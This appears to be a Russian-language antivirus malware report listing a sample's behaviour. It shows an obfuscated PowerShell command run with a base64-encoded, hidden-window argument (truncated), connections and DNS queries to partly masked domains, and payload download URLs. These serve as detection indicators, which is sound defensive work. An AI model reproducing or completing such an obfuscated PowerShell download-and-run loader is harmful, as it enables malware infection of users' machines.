Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0ATwBCAEoARQBDAFQAIAAgAGkAbwAuAEMATwBtAFAAUgBFAHMAUwBpAE8ATgAuAGQARQBGAGwAQQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsAcwB5AFMAVABFAE0ALgBpAG8ALgBtAEUATQBvAFIAeQBzAHQAUgBlAGEAbQBdACAAWwBDAE...
- 'ou##yn.com':80
- 'va###tico.ru':80
- 'kl###eier.de':80
- 'za##.com.br':80
- http://ou##yn.com/efV5qsN/
- http://va###tico.ru/fvxr/
- http://za##.com.br/UIrE4e/
- DNS ASK ou##yn.com
- DNS ASK va###tico.ru
- DNS ASK al###.com.ar
- DNS ASK kl###eier.de
- DNS ASK za##.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQB3AC0ATwBCAEoARQBDAFQAIAAgAGkAbwAuAEMATwBtAFAAUgBFAHMAUwBpAE8ATgAuAGQARQBGAGwAQQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsAcwB5AFMAVABFAE0ALgBpAG8ALgBtAEUATQBvAFIAeQBzAHQAUgBlAGEAbQBdACAAWwBDAE...' (со скрытым окном)